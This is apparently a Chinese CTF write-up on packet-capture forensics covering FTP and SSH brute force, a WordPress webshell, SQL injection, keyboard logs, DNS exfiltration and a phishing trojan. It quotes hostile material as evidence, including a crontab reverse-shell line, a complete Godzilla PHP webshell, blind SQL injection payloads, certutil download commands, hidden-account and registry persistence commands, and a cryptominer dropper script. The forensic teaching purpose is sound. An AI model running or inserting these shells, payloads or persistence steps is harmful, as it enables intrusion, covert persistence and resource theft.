流量分析

FTP流量分析

首先netA现分析一波,直接分析出了登入的用户密码,还有导出的文件,

image-20260719110418942

image-20260719110430064

接下来分析流量包

1.提交攻击者 IP

过滤ftp流量之后

统计->会话->IPv4

image-20260719111039524

攻击者ip是192.168.39.88,受害者ip为192.168.39.90.

2.攻击者对哪个网段进行了存活探测?发现了多少台存活主机?

统计->端点->IPv4

image-20260719111618330

如图存在一个局域网``,内网地址是

1
2
3
4
5
6
7
8
9
192.168.39.1
192.168.39.2
192.168.39.88
192.168.39.89
192.168.39.90
192.168.39.91
192.168.39.92
192.168.39.254
192.168.39.255

广播地址为192.168.39.255,网络网安设备192.168.39.254,192.168.39.1。剩余7个

答案为192.168.39.0/24,7

3.受害服务器开放了哪些常见端口?

攻击者存在端口扫描行为,查看开放端口过滤语法为

1
ip.src==192.168.39.90 && ip.dst==192.168.39.88 && tcp.flags.syn==1 && tcp.flags.ack==1

SYN+ACK = 端口开放

image-20260719112429054

image-20260719112444396

常见的端口有

21,135,139,445,5985

4.受害服务器的 FTP 服务软件和版本是什么?

直接过滤ftp流量

image-20260719112909087

FileZilla Server 0.9.60 beta

5.攻击者在暴力破解前使用 Nmap 脚本探测了 FTP 匿名登录,尝试的用户名是什么?

image-20260719113449957

第一次尝试的用户名是anonymous

6.攻击者使用了什么工具进行暴力破解?

常见的密码爆破就是Hydra

7.暴力破解的目标用户名和成功密码分别是什么?

netA一把梭

ftpuser/ftp@2026

8.暴力破解共尝试了多少个密码?产生了多少次登录失败?

这一题有点坑,刚开始以为是总共尝试了多少次,发现不对就卡了好久

1
ftp.request.command=="PASS"

image-20260719123313694

这里密码登入一共有36条流量,

image-20260719123354506

这4条是手工探测,不属于暴力破解,同时在密码中有

image-20260719123545646

这个在暴力破解的范畴但是重复了,总共是36-4-2=30,

上图密码成功登入3次,失败次数就是36-3=33

答案30,33

9.攻击者登录后浏览了哪些目录?

image-20260719114412820

cwd为切换目录,答案为人事档案,财务报表,运维文档,项目投标

10.攻击者一共下载了几个文件?列出全部文件名。

image-20260719114759330

答案为5|README.txt,华章科技-2026年6月薪资明细.pdf,华章科技-2026年Q2财务报告.pdf,华章科技-内部系统凭据清单.pdf,华章科技-山东政务项目投标方案.pdf

在wireshark中也能直接看到

image-20260719115003592

11攻击者下载 PDF 前切换了什么传输模式?

每一次下载pdf都会执行TYPE I,是二进制传输模式,虽然知道是这个,但是答案也是试了很久是 BINARY

12被窃取的财务报告中,公司 Q2 总营收是多少?

image-20260719115650052

导出pdf直接看就行8743.2

13被窃取的薪资表中,CEO 王建国的月薪总额是多少?

image-20260719121016702

14凭据文件中生产环境数据库主库的密码是什么?

image-20260719121048679

PgMaster#2026db

15投标文件中该项目的投标总价是多少?

image-20260719121125256

2350

16被窃取的文件中隐藏的 flag 是什么?

在华章科技-内部系统凭据清单

image-20260719121322030

flag{420E8A8C540D4BE07F0221F46CCFB8EE}

SSH流量分析

1.攻击者的 IP 地址是什么?

过滤ssh流量

image-20260721145624829

发现大部分都是192.168.11.129和192.168.11.96之间的流量,客户端肯定就是攻击者,ip就是192.168.11.129

2.受害服务器的 IP 地址是什么?

同上受害者ip就是192.168.11.96

3.攻击者对目标网段进行了存活主机探测,请写出扫描的网段。

统计->端点

image-20260721145943208

已经知道了受害者ip,网段就是192.168.11.0/24

4.攻击者存活主机探测使用了什么协议?共发现多少台存活主机?

统计->协议分级

image-20260721150805325

可以看到存在ARP和ICMP流量,过滤ARP流量

image-20260721150848077

在断点统计中在目标网段的ip一共有6个,这里是算上192.168.11.1

ARP-6

5.受害服务器开放了哪些端口?

1
ip.src==192.168.11.96&& ip.dst==192.168.11.129 && tcp.flags.syn==1 && tcp.flags.ack==1

image-20260721151804464

端口有22,80,443

或者netA,端口统计

image-20260721151837365

6.攻击者使用了什么工具进行 SSH 暴力破解?(写出工具名称和 SSH 客户端标识)

1
ssh&&ip.src==192.168.11.129&&ip.dst==192.168.11.96

image-20260721153338083

libssh 是暴力破解工具Hydra 的底层依赖库,同时存在毫秒级批量新建完整 SSH 握手流程,因此是使用Hydra爆破

Hydra-SSH-2.0-libssh_0.11.3

7.受害服务器的 SSH 服务版本是什么?

image-20260721153827227

SSH-2.0-OpenSSH_10.0p2 Ubuntu-5ubuntu5.4

8.攻击者暴力破解共尝试了多少次密码?

这一题应该有问题,答案是30

具体参考https://mp.weixin.qq.com/s/xYR3dYtFIfakpCHgnVwyBQ

9.攻击者暴力破解成功后登录的用户名是什么?

image-20260721171138382

用户名为sanjiu

10.攻击者进入反弹 Shell 后执行的第一条命令是什么?

第一条命令为whoami

11攻击者一共建立了几次反弹 Shell 连接?

image-20260721175357803

image-20260721175414539

一共2次

12受害服务器的主机名是什么?

sanjiu@sanjiu-VMware-Virtual-Platform:~$

主机名为sanjiu-VMware-Virtual-Platform

13.攻击者手动登录时使用的 SSH 客户端标识是什么?

tcp流1058中有登入时使用的标识

image-20260721172127418

SSH-2.0-OpenSSH_10.2p1 Debian-3

14.反弹 Shell 使用的端口号是什么?

在上面统计时就知道攻击者开放了4444端口

image-20260721172829098

既然是反弹shell那就过滤一下

1
ip.src==192.168.11.96&&ip.dst==192.168.11.129

image-20260721173128401

可以看到监听的端口是4444,这里容易误把写入定时任务的9999端口当作答案,实际要看流量

15反弹 Shell 的连接方向是什么?(谁主动连接谁)

192.168.11.96–>192.168.11.129:4444

16攻击者将 root 密码修改为了什么?

image-20260721173904622

sanjiu@@@123

17.攻击者创建的影子账户用户名和 UID 分别是什么?

image-20260721174219013

sanJiu-0

18攻击者写入的 Crontab 后门完整内容是什么?

image-20260721174324663

*/10 * * * * root bash -i >& /dev/tcp/192.168.11.129/9999 0>&1

19.攻击者 Crontab 后门的回连端口是什么?

9999

20.攻击者在受害机上创建的隐藏后门脚本完整路径是什么?

image-20260721174456644

分步写后面文件,路径/tmp/.backdoor.sh

21.攻击者写入 SSH 公钥后门的公钥文件完整路径是什么?

image-20260721174606628

路径为 /root/.ssh/authorized_keys

22.受害机 /etc/shadow 文件中 root 用户的密码哈希值是什么?

image-20260721174826121

$y$j9T$HAiWkWk/MXH2ZeZDj9uXl1$jr4kDa9qVoVGC9kJb2U7tK7nHRcWQA/VdB6OoMl8d6C

WebShell3

1.提交攻击者 IP 地址。

统计->会话

image-20260721161847356

这两个ip会话数据最多,可以判断为攻击者和受害者,攻击者192.168.99.28

2.提交受害服务器 IP 地址。

同上,受害者192.168.99.59

3.攻击者使用什么工具进行了内网资产探测?

在tcp5514找了fscan

image-20260722112559598

4.攻击者内网扫描了哪些存活主机 IP?(从小到大,逗号分隔)

过滤icmp流量

image-20260722090522463

除去攻击者本身的ip,最后答案为

192.168.99.58,192.168.99.59,192.168.99.60,192.168.99.61,192.168.99.62,192.168.99.128,192.168.99.254

5.受害服务器开放了哪些端口?(从小到大,逗号分隔)

net一把梭或者

1
ip.src == 192.168.99.59 && tcp.flags.syn == 1 && tcp.flags.ack == 1

image-20260721202952233

80,135,139,445,3306,3389,5985

6.受害服务器 Web 中间件及版本是什么?

webshell流量直接过滤看post请求流量,追流看一下

image-20260721204430243

nginx/1.15.11

7.受害服务器使用的 WordPress 主题名称和版本号是什么?

tcp5074

image-20260722115733393

使用的是WebStack-1.2024

答案 WebStack 1.2024

8.攻击者利用了哪个 CVE 漏洞?

直接搜索一下资料就行

image-20260722112120973

CVE-2026-1555

9.攻击者漏洞利用的完整请求路径(含参数)是什么?

image-20260721215956461

/wp-admin/admin-ajax.php?action=img_upload

10.攻击者上传 Webshell 时使用的客户端工具是什么?

如上图 curl/8.5.0

11.攻击者上传的 Webshell 原始文件名是什么?

tcp流5251,上传的源文件为web.php

image-20260721215207446

12.攻击者上传的 Webshell 在服务器上的完整 URL 是什么?

要是完整的http://192.168.99.59/wp-content/uploads/2026/06/20260617192508_4dc56fd5.php

13.攻击者使用的 Webshell 管理工具是什么?

上图代码就是哥斯拉,而且下面也说了哥斯拉的连接密钥,webshell管理工具就是Gobzilla

14.该工具使用的加密方式是什么?

netA一把梭

image-20260722091058840

PHP_XOR_RAW

15.哥斯拉的连接密钥是什么?

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
<?php
@session_start();
@set_time_limit(0);
@error_reporting(0);
function encode($D,$K){
for($i=0;$i<strlen($D);$i++) {
$c = $K[$i+1&15];
$D[$i] = $D[$i]^$c;
}
return $D;
}
$payloadName='payload';
$key='3c6e0b8a9c15224a';
$data=file_get_contents("php://input");
if ($data!==false){
$data=encode($data,$key);
if (isset($_SESSION[$payloadName])){
$payload=encode($_SESSION[$payloadName],$key);
if (strpos($payload,"getBasicsInfo")===false){
$payload=encode($payload,$key);
}
eval($payload);
echo encode(@run($data),$key);
}else{
if (strpos($data,"getBasicsInfo")!==false){
$_SESSION[$payloadName]=encode($data,$key);
}
}
}

连接密钥是key,不是3c6e0b8a9c15224a

16.受害服务器有多少张网卡?

接下来就是解密哥斯拉流量,tcp流5271,修改显示为原始数据

image-20260722095350270

解密请求数据,配置如图

image-20260722095426115

在响应数据包中,没有换行,可以看0d0a这个可以看作为换行符,两个0d0a之间的数据就是返回数据

image-20260722095744726

image-20260722095803474

根据返回数据,一共有4个网卡

17.受害服务器的主机名是什么?

继续往下看就行了,tcp流5272攻击者执行了

image-20260722100122305

响应数据

image-20260722100143839

WIN-5CNHCFAIMP9

18.攻击者通过 Webshell 读取了 WordPress 配置文件,数据库用户名和密码分别是什么?

后面就是一直看流量解密就行了,在tcp5276,攻击者执行了type E:\phpstudy_pro\WWW\wp-config.php

响应数据如下

image-20260722101214559

wordpress/123456

19.攻击者创建的隐藏后门账户完整用户名是什么?

tcp流5280攻击者执行了net user AdminJIU$ Admin@12345! /add

隐藏用户名为AdminJIU$

20.该后门账户的密码是什么?

密码是Admin@12345!

21.攻击者上传的伪装成系统服务的后门脚本文件名是什么?

tcp流5284中攻击者执行了

1
schtasks /create /sc minute /mo 10 /tn "Microsoft\Windows\WindowsDefender\SecurityHealthCheck-flag{65180BB0B2A30D0160488C1A997A470A}" /tr "C:\Windows\System32\WinDefenderHealthCheck.bat" /ru SYSTEM /f

伪装的后门脚本为WinDefenderHealthCheck.bat

22.该后门脚本的回连地址是什么?

1
certutil -urlcache -split -f "[http://192.168.99.28:8080/microsoftUpdate/healthcheck.dat](https://link.wtturl.cn/?target=http%3A%2F%2F192.168.99.28%3A8080%2FmicrosoftUpdate%2Fhealthcheck.dat&scene=im&aid=497858&lang=zh)" "%TEMP%\health.dat" >nul 2>&1

这里要填完整的地址http://192.168.99.28:8080/microsoftUpdate/healthcheck.dat

23.攻击者后门脚本使用什么 Windows 工具下载回连载荷?

同上使用的工具是certutil

24.攻击者创建的计划任务后门中隐藏的 flag 是什么?

上面分析过了是flag{65180BB0B2A30D0160488C1A997A470A}

25.攻击者在 RDP 会话中使用 certutil 下载的两个伪装恶意文件原始文件名是什么?

攻击者通过RDP下载文件,那么过滤一下流量

1
ip.src==192.168.99.59&&ip.dst==192.168.99.28&&http

从受害者->攻击者的流量,其中有两个文件

/%E5%8E%9F%E7%A5%9E.exe

/%E6%A4%8D%E7%89%A9%E5%A4%A7%E6%88%98%E5%83%B5%E5%B0%B8%E6%9D%82%E4%BA%A4%E7%89%88v2.1%E5%AE%89%E8%A3%85%E5%8C%85.exe

image-20260722114743701

分别解码就是

原神.exe

植物大战僵尸杂交版v2.1安装包.exe

原神.exe-植物大战僵尸杂交版v2.1安装包.exe

26.攻击者下载恶意文件使用的 HTTP 服务是什么?

tcp流5519,image-20260722115329914

http服务就是SimpleHTTP/0.6 Python/3.12.0

分析完太不容易了,考察的真是太细了

SQL注入流量分析

1.提交攻击者 IP。

依旧统计->会话

image-20260722140634487

192.168.9.25

2.攻击者使用了什么工具进行攻击?提交工具名称和版本。

后面的注入流量User-Agent有答案

image-20260722141252784

3.攻击者针对哪个参数进行了注入?

同上,参数为category

4.该注入使用了什么数据库函数?

看流量,在注入过程中使用了

image-20260723141024110

5.攻击者枚举出数据库中共有几张表?

这个就是看攻击流量,攻击者存在爆破表数量得行为,

1
http.request.uri contains "tablename"

tcp471-479存在爆破数量行为,tcp流474爆破语句为

1
category=test' AND 3448=(CASE WHEN (ASCII(SUBSTRING((SELECT COALESCE(CAST(COUNT(tablename) AS VARCHAR(10000))::text,(CHR(32))) FROM pg_tables WHERE schemaname=(CHR(112)||CHR(117)||CHR(98)||CHR(108)||CHR(105)||CHR(99)))::text FROM 1 FOR 1))!=53) THEN (SELECT 3448 FROM PG_SLEEP(1)) ELSE 3448 END) AND 'Giyc'='Giyc

判断表得数量第一个字符是否是5,后续流量是判断数量的第二个字符,发现没有第二个字符,然后开始爆破第一个表名得第一个字符证明表的数量就是5

6.攻击者从哪张表中获取了 flag?提交表名。

上面说到后续全部都是逐字符爆破5个表得表名,在不使用ai得前提下这个工作量是非常巨大的,这个流量太多了,netA也不好使

这里可以过滤http流量从后往前跳着看,然后就可以找到

1
test' AND 3915=(CASE WHEN (ASCII(SUBSTRING((SELECT COALESCE(CAST(flag_value AS VARCHAR(10000))::text,(CHR(32))) FROM public.secret_flag ORDER BY id OFFSET 0 LIMIT 1)::text FROM 16 FOR 1))>60) THEN (SELECT 3915 FROM PG_SLEEP(1)) ELSE 3915 END) AND 'xcwG'='xcwG

找打爆破flag得流量,表名就是secret_flag,字段就是flag_value

7.提交 flag。

过滤流量

1
http.request.uri contains "flag_value"&&ip.src==192.168.9.25

分析就行了,太多了不想看,放一下yuiiijuk佬得答案

flag{8673db96fa2dceeb}

8.攻击者获取了管理员账户信息,管理员密码是什么?

参考yuiiijuk佬得答案

123456

参考文章https://mp.weixin.qq.com/s/xYR3dYtFIfakpCHgnVwyBQ

键盘取证 —— 爱而不得

1.受害者计算机的登录用户名是什么?

netA一把梭完了,分析处理完就是

1
wangruoyao<RET>Wr040February!<RET>baobao you yige nande xiangyao zhui wo ,hao fan a !<RET>gen ge biantai shide ,yizhi jiejin wo <RET>haoxiang shi jiao liulu <RET>ni bang wo xiangxiang zenme ban <RET>wo xian shui la !<RET>baobao wanan <GA>baobao <RET>cmd<RET>whoami<RET>ipconfig<RET>net user<RET>net user happy$ woaini yaoyao @20030613 /add<RET>net localgroup administrators happy$ /add<RET>certutil -urlcache -split -f http"//124.223.18.231/gift.exe :C"\Users\wangruoyao\Desktop\songgei yaoyao de liwu -zhiyou yaoyao cai keyi dakai .exe:<RET>copy :C"\Users\wangruoyao\Desktop\songgei *: C"\Windows\Temp\svchost.exe<RET>attrib +h +s C"\Windows\Temp\svchost.exe<RET>reg add :HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run: /v :SystemUpdate: /t REG_SZ /d :C"\Windows\Temp\svchost.exe: /f<RET>schtasks /create /tn :WindowsUpdate: /tr :C"\Windows\Temp\svchost.exe: /sc onlogon /ru System<RET>copy C"\Windows\Temp\svchost.exe :C"\Users\wangruoyao\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe:<RET>netsh advfirewall firewall add rule name=:allow_remote: dir=in action=allow protocol=tcp localport=4444<RET>dir C"\Users\wangruoyao\Desktop<RET>type C"\Users\wangruoyao\Desktop\notes.txt<RET>netstat -ano<RET>tasklist<RET>exit<RET>

主机名是wangruoyao

flag{wangruoyao}

2.受害者的登录密码是什么?

输入完Wr040February!之后还是聊天,登入密码就是Wr040February!

flag{Wr040February!}

3.攻击者”happy”的真实姓名是什么?(提交拼音小写)

1
haoxiang shi jiao liulu

好像是叫liulu

flag{liulu}

4.攻击者在受害者计算机上创建的隐藏账户及其密码分别是什么?(密码为中文,需根据拼音还原)

1
net user happy$ woaini yaoyao @20030613 /add

账号是happy$,密码是我爱你杳杳@20030613

flag{happy$/我爱你杳杳@20030613}

5.攻击者入侵后执行的第一条系统命令是什么?

分析聊天记录第一条是whoami

flag{whoami}

6.攻击者入侵后执行的最后一条命令是什么?

最后一个是exit

flag{exit}

7.攻击者使用了什么系统自带工具从远程服务器下载恶意程序?

1
certutil -urlcache -split -f http://124.223.18.231/gift.exe C:\Users\wangruoyao\Desktop\songgei yaoyao de liwu -zhiyou yaoyao cai keyi dakai .exe

flag{certutil}

8.攻击者下载恶意程序所连接的远程服务器IP地址是什么?

同上

flag{124.223.18.231}

9.攻击者下载到受害者桌面的恶意文件完整文件名是什么?(需根据拼音还原中文)

songgei yaoyao de liwu -zhiyou yaoyao cai keyi dakai .exe

舔狗

flag{送给杳杳的礼物-只有杳杳才可以打开.exe}

10.攻击者写入注册表实现开机自启动的键值名称是什么?

1
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v SystemUpdate /t REG_SZ /d C:\Windows\Temp\svchost.exe /f

键名为SystemUpdate

flag{SystemUpdate }

11.攻击者通过防火墙规则开放了哪个本地端口的入站访问?

1
netsh advfirewall firewall add rule name=:allow_remote: dir=in action=allow protocol=tcp localport=4444

flag{4444}

DNS流量

查看dns流量,发现在cdn-analytics.cloud-metric.net域名前有字符串,并且还有编号,一共是00-07

image-20260722155956768

1
2
3
4
5
6
7
8
0085e99f1b7c61
01dd5fda41a086
020c6169bbbd08
03a975aaed0b0c
043a20563a4f45
05b571ac53c359
0640cd62040994
0763929dd66dd3

拼接一下

1
85e99f1b7c61dd5fda41a0860c6169bbbd08a975aaed0b0c3a20563a4f45b571ac53c35940cd6204099463929dd66dd3

netA分析出来有一个key,base64解码得到hbc2@kfcfwa2026!

image-20260722160142621

AES-ECB解密

image-20260722160453528

flag{18A55236EC494BA53238DA9613BB9AAE}

USB流量分析

netA一把梭了

capdata_左键

上下颠倒即可

capdata_左键-上下反转

flag{a6f70fe34b10419b8d17c7422e3c974a}

色情钓鱼邮件流量

56道题,叁玖佬还是太权威了

1.攻击者使用的操作系统主机名是什么?

这个应该是出题人后面又修改了。开始的答案是flag{192.168.39.88}后面改为flag{kali}了。过滤dhcp流量

image-20260724172312314

2.攻击者的IP地址是多少?

过滤smtp协议

image-20260724172430931

攻击者向受害者发送邮件,攻击者ip为192.168.39.88,邮件服务器ip为192.168.39.138

flag{192.168.39.88}

3.受害者主机一共配置了几个IP地址?请按照从小到大的顺序全部列出。

上面分析到邮件服务器ip为192.168.39.138,受害者与攻击者用的是同一个邮件服务器,那么过滤

1
ip.src==192.168.39.138&&pop

看一下客户端拉去邮箱内已存地邮件有几个ip

image-20260723171544627

截图仅为部分ip最后答案为

flag{192.168.39.92,192.168.39.144,192.168.39.150,192.168.39.152}

4.邮件服务器的IP地址和域名分别是什么?(格式:IP_域名)

image-20260723171654086

域名为mail.jiujiu.com

flag{192.168.39.138_mail.jiujiu.com}

5.邮件服务器使用的是什么软件?SMTP 和 POP3 分别使用的端口号是多少?(格式:软件,SMTP端口,POP3端口)

如上图,使用的是Postfix,netA分析端口

image-20260723172404839

Postfix 默认监听 TCP 25

flag{Postfix,25,110}

6.邮件服务器EHLO响应中声明支持哪些传输加密方式?

image-20260723173116557

在EHLO响应中,只有STARTTLS与加密有关

flag{STARTTLS}

7.受害者主机的计算机名是什么?

查看DHCP流量

image-20260723195432190

这里有主机名

flag{WIN-5CNHCFAIMP9}

8.网络中DHCP服务器分配给受害者的默认网关IP是多少?

看DHCP ACK,受害者ip的流量报文

image-20260723200013635

答案是192.168.39.254

image-20260723200422041

9.攻击者使用的钓鱼邮箱地址是什么?

过滤smtp追流看数据

image-20260723200533589

发送方tiantian@jiujiu.com,接收方chenxiaoming@jiujiu.com

flag{tiantian@jiujiu.com}

10.受害者的邮箱地址是什么?

同上flag{chenxiaoming@jiujiu.com}

11.受害者通过POP3协议收取邮件时使用的密码是什么?

过滤pop流量

image-20260723200926642

base64解码结果

chenxiaoming\chenxiaoming123

密码是chengxiaoming123

flag{chenxiaoming123}

12.攻击者 tiantian 在 POP3 登录时使用的密码是什么?

这里要看的pop流量,Destination为192.168.38.88

image-20260723201501680

解码为tiantian/Mail#Jiujiu2026

flag{Mail#Jiujiu2026}

13.在整个攻击过程中,受害机 POP3 总共进行了几次登录?

1
pop&&(ip.dst==192.168.39.144||ip.dst==192.168.39.92||ip.dst==192.168.39.150||ip.dst==192.168.39.152)&&pop contains "Logged in"

image-20260724210131380

这里登入的有20条但是答案不是20,是2

14.在整个攻击过程中,攻击者(tiantian)一共向受害者发送了多少封邮件?

还是按照上面的过滤查看受害者登入之后邮箱里有几封邮件,tcp流84

image-20260723204556318

一共有18封邮件

flag{18}

15.攻击者发送的所有邮件中,体积最大的一封邮件大小是多少字节?(SMTP SIZE参数值)

其实在刚才tcp流84中就有各个邮件的大小

image-20260723205723426

最大的是9139917,但是题目要求是以SMTP SIZE参数值为准,

1
smtp.req.parameter contains "SIZE"&&ip.src==192.168.39.88

image-20260723205928046

这里最大就是9139617

flag{9139617}

16.攻击者发送的包含恶意附件”上门服务”的那封邮件,其邮件主题是什么?(解码后的中文)

发送的exe的邮件就拿那个最大的,追流看一下

image-20260723210437588

解码一下

image-20260723210549022

主题是在

1
2
Subject: =?UTF-8?B?5L2g55qE5LiK6Zeo5pyN5Yqh5ZOmIQ==?=

image-20260723210907248

flag{你的上门服务哦!}

17.第一封钓鱼邮件的主题是什么?(解码后的中文)

1
smtp.req.parameter contains "SIZE"&&ip.src==192.168.39.88

流量按照时间排序,第一封邮件是

image-20260723211139045

主题是哥哥

flag{哥哥}

18.攻击者(tiantian)在社工邮件中共向受害者发送了多少张PNG图片?

image-20260723212207214

看攻击者发送的邮件,找到了1.png,2.png,3.png4.png,5.png

flag{5}

19.木马上线后自我复制到哪个路径,伪装成什么系统进程名?

俺不会逆向,土哥给的答案

flag{C:\ProgramData\Microsoft\Windows\WMI\WmiPrvSE.exe,WmiPrvSE.exe}

20.可疑文件”上门服务.exe”的SHA256哈希值是多少?

微步沙箱分析文件

image-20260723220538252

flag{4a9ed2d751acaea3317077bd774c7044bd4e8379dceace0ca8f6e0dee7160656}

21.该恶意样本是基于什么开发框架编译的?

image-20260723220934356

flag{.net}

22.该恶意样本的PE子系统类型是什么?(十六进制值)

Magic 字段:PE32 executable (GUI) Intel 80386 Mono/.Net assembly标注为 GUI 图形界面程序,对应 PE 子系统常量 IMAGE_SUBSYSTEM_WINDOWS_GUI

对应2

flag{0x0002}

23.分析恶意文件,该恶意程序与C2服务器通信时使用的HTTP Content-Type是什么?

这里直接导入密钥文件,tls流量解密,过滤post请求

image-20260724101916641

flag{application/x-www-form-urlencoded}

24.分析恶意文件,该恶意程序忽略TLS证书校验所调用的对象属性全名是什么?

逆向分析这一块就让ai干吧。不会逆向

答案为ServicePointManager.ServerCertificateValidationCallback

不是System.Net.ServicePointManager.ServerCertificateValidationCallback!!!!

flag{ServicePointManager.ServerCertificateValidationCallback}

25.该恶意程序的默认心跳间隔Sleep时间最短为多少毫秒?

这就是逆向分析了,让ai分析的,这个题有点坑

image-20260724202049926

不是正常区间的最小值3000,答案是200,

flag{200}

26.恶意程序回连C2服务器使用的端口号是多少?

image-20260724112218746

flag{8443}

27.木马 C2 备用端口是多少?

这里逆向分析有G..cctor 里初始化了两个端口变量:

  • _port = 8443
  • _port2 = 4443

备用端口是

flag{4443}

28.C2通信使用的TLS版本和密码套件编号分别是什么?(格式:TLS版本_密码套件十六进制)

过滤tls流量,要查看成功握手的流量

查看Client Hello

image-20260724115011973

Server Hello

image-20260724120047869

flag{0x0303_0xc030}

29.C2通信的JA3指纹值是多少?

过滤tls流量,

image-20260724113635891

flag{43016d7f7f9336b17c884650d0d2545d}

30.使用sslkeys.log解密C2流量后,C2心跳包的POST路径是什么?

解密后过滤post请求

image-20260724144245086

image-20260724144351295

存在固有特征Expect: 100-continue,还有通用UA: Mozilla/5.0,答案为

flag{/s}

31.解密C2流量后,心跳包中上报的机器标识字段内容是什么?(完整的POST body解码后内容)

同上

image-20260724144351295

flag{id=WIN-5CNHCFAIMP9&s=1}

32.木马上线时向 C2 路径 /h 上报的初始信息包含哪些字段和值?(格式:字段1=值,字段2=值,字段3=值)

tcp流381

image-20260724144545246

flag{id=WIN-5CNHCFAIMP9,user=Administrator,os=Microsoft Windows NT 6.2.9200.0}

33.C2结果回传使用的POST路径是什么?

post请求一共有3个路径/s,/r,/h

回传使用的就是/r,追踪流验证一下,tcp236

image-20260724145201198

解码后为win-5cnhcfaimp9\administrator

C2 回传主机身份取证信息

flag{/r}

34.攻击者通过C2在受害主机上执行whoami命令后获取到的完整结果是什么?

tcp235image-20260724150452432

tcp236包中回显结果

flag{win-5cnhcfaimp9\administrator}

35.C2主机信息上报路径/h中包含了操作系统版本信息,受害者操作系统的完整标识是什么?

tcp流383

image-20260724151056345

flag{Microsoft Windows NT 6.2.9200.0}

36.攻击者通过C2在受害主机上创建了几个隐藏后门账户?分别是什么用户名?

一共有2个

image-20260724152947184

image-20260724153332747

flag{2,yue,yue$}

37.攻击者创建 yue 账户时设置的密码是什么?

tcp268

image-20260724152947184

flag{Aa123456!@}

38.攻击者用什么注册表路径和键值隐藏后门账户。写出完整路径、键名、类型和数值。

tcp流302

image-20260724153554045

1
2

e reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v yue$ /t REG_DWORD /d 0 /f

路径HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList

键名yue$

类型REG_DWORD

数值0

flag{HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList,yue$,REG_DWORD,0}

39.受害者的手机号、身份证号和家庭住址分别是什么。(手机号格式:xxx-xxx-xxx)

tcp流90

image-20260724191323088

base64解码image-20260724191346696

这里面就是受害者的信息,按照题目要求填写即可

flag{138-5710-2026,330106199508151231,浙江省杭州市西湖区文一西路888号星月交响小区5幢2单元801室}

40.木马具备哪些恶意功能,对应 C2 命令字是什么。(格式:flag{命令字:function,命令字:function},按命令字 a-z 排序;短命令按功能归一化,如 c 记为 cam、e 记为 exec、i 记为 info)

这里一共有4个命令字

1.exec

image-20260724190722669

2.info

image-20260724191102559

image-20260724191234573

3.cam

image-20260724200932380

image-20260724200950718

4.sc

image-20260724190040808

image-20260724190100349

这里其实是要结合木马程序分析好一点,需要逆向分析。这里有一个屏幕截图和摄像头截图,单从流量包中分析分析不出哪一个是屏幕截图,哪一个是摄像头,这一题我的理解就到这了,具体详解还有看官方wp。最后答案是

flag{cam:webcam_capture,exec:command_execution,info:system_information,sc:screenshot}

还有一个疑问,为啥最后是sc,而不是screen。

41.木马屏幕截图用了什么 Windows API,图片保存什么格式,传给 C2 前做了什么编码。

这个应该需要逆向分析,根据下面题目提示是用到了 BitBlt ,屏幕截图为

image-20260724193548163

base64解码时jpg图片,最后答案

flag{BitBlt,JPEG,Base64}

42.截图功能中 BitBlt 的 dwRop 光栅操作常量值是什么?(十六进制)

太菜了不会逆向,土哥分析的我也不懂

flag{0xCC0020}

ai分析如下

image-20260724195229604

43.WindowsUpdate.bat创建的计划任务名称是什么?

攻击者执行了

1
certutil -urlcache -split -f http://192.168.39.88:8888/WindowsUpdate.bat C:\Users\yue\Downloads\WindowsUpdate.bat

netA分析时image-20260724162813277

接下来就分析bat文件即可

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
@echo off
setlocal

set "a=WindowsRuntimePlatformUpdate"
set "b=xmr.cryptonight-hub.com"
set "d=%APPDATA%\Microsoft\Windows\RuntimePlatform"
set "f=%d%\config.json"
set "e=%d%\svchost.bat"

schtasks /query /tn "%a%" >nul 2>&1 && exit /b

if not exist "%d%" md "%d%" 2>nul
attrib +h "%d%" >nul 2>&1

copy /y "%~f0" "%e%" >nul 2>&1
attrib +h "%e%" >nul 2>&1

(echo {"api":{"id":null,"worker-id":null},"http":{"enabled":false},"background":true,"randomx":{"mode":"auto","1gb-pages":false,"rdmsr":true,"wrmsr":true,"numa":true},"cpu":{"enabled":true,"huge-pages":true,"priority":1,"max-threads-hint":50,"asm":true},"pools":[{"algo":null,"coin":"monero","url":"%b%:443","user":"49XnPvDkmNQSPBGKEgTRpnHfv7PZiEMVzDGmNcLHn5FyLYuFmJRLBAwMbBF1fQRHGpzCwp9hHt6NsfrSPeXQqzqZRa1p2aZ","pass":"RTPlatformSvc","tls":true,"keepalive":true,"daemon":false}]})>"%f%"

attrib +h "%f%" >nul 2>&1

schtasks /create /tn "%a%" /tr "cmd /c %e%" /sc hourly /mo 2 /st 02:00 /f /ru SYSTEM /rl HIGHEST >nul 2>&1

ping -n 3 127.0.0.1 >nul 2>&1
start /b "" cmd /c "%e%" >nul 2>&1

del /f /q "%~f0" >nul 2>&1
@echo off
setlocal

set "a=WindowsRuntimePlatformUpdate"
set "b=xmr.cryptonight-hub.com"
set "d=%APPDATA%\Microsoft\Windows\RuntimePlatform"
set "f=%d%\config.json"
set "e=%d%\svchost.bat"

schtasks /query /tn "%a%" >nul 2>&1 && exit /b

if not exist "%d%" md "%d%" 2>nul
attrib +h "%d%" >nul 2>&1

copy /y "%~f0" "%e%" >nul 2>&1
attrib +h "%e%" >nul 2>&1

(echo {"api":{"id":null,"worker-id":null},"http":{"enabled":false},"background":true,"randomx":{"mode":"auto","1gb-pages":false,"rdmsr":true,"wrmsr":true,"numa":true},"cpu":{"enabled":true,"huge-pages":true,"priority":1,"max-threads-hint":50,"asm":true},"pools":[{"algo":null,"coin":"monero","url":"%b%:443","user":"49XnPvDkmNQSPBGKEgTRpnHfv7PZiEMVzDGmNcLHn5FyLYuFmJRLBAwMbBF1fQRHGpzCwp9hHt6NsfrSPeXQqzqZRa1p2aZ","pass":"RTPlatformSvc","tls":true,"keepalive":true,"daemon":false}]})>"%f%"

